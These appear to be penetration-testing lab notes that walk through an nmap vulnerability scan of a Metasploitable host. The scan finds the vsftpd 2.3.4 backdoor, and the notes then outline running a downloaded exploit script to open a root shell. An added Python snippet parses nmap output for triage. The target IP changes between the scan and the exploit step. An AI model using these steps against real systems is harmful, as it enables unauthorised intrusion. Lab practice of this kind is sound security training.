Attacker
Scan
- nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://www.securityfocus.com/bid/48539
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 0C:67:68:58:00:00 (Unknown)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
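Added example (not part of the original notes): when the same scan is repeated across an inventory, the findings reported as VULNERABLE can be extracted from Nmap's normal output for triage and patch tracking. The function name, regexes and result fields are assumptions of this example; the sample lines are copied from the scan output above.

```python
import re

# Sample: lines copied from the scan output on this page.
SAMPLE = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| Disclosure date: 2011-07-03
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 0C:67:68:58:00:00 (Unknown)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
# Script names are lowercase with hyphens; this skips "VULNERABLE:" and "References:".
SCRIPT_RE = re.compile(r"^\|[ _]\s*([a-z0-9][a-z0-9-]*):\s*$")
FIELD_RE = re.compile(r"^\|[ _]?\s*(State|IDs|Disclosure date):\s*(.+)$")

def parse_findings(text):
    """Return one dict per script block whose State starts with VULNERABLE."""
    findings, port, cur = [], None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:  # a new port line starts a new context
            port = {"port": int(m[1]), "proto": m[2],
                    "service": m[3], "version": m[4].strip()}
            cur = None
        elif not line.startswith("|"):
            cur = None  # script output for this port has ended
        elif port and (m := SCRIPT_RE.match(line)):
            cur = {"script": m[1], **port, "state": None, "ids": {}, "disclosed": None}
            findings.append(cur)
        elif cur and (m := FIELD_RE.match(line)):
            key, val = m[1], m[2].strip()
            if key == "State":
                cur["state"] = val
            elif key == "IDs":  # "BID:48539 CVE:CVE-2011-2523" -> dict
                cur["ids"] = dict(t.split(":", 1) for t in val.split() if ":" in t)
            else:
                cur["disclosed"] = val
    # "NOT VULNERABLE" and blocks without a State line are dropped.
    return [f for f in findings if (f["state"] or "").startswith("VULNERABLE")]

if __name__ == "__main__":
    for f in parse_findings(SAMPLE):
        print(f["port"], f["version"], f["script"], f["ids"].get("CVE"), f["state"])
```

For larger scans, Nmap's XML output (`-oX`) is a more stable format to parse than this text form.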
Search Google for an exploit
- vsftpd 2.3 4 exploit-db
Find the exploit
Run the exploit
- python vsftp.py 10.80.100.105
Success, shell opened
Send `exit` to quit shell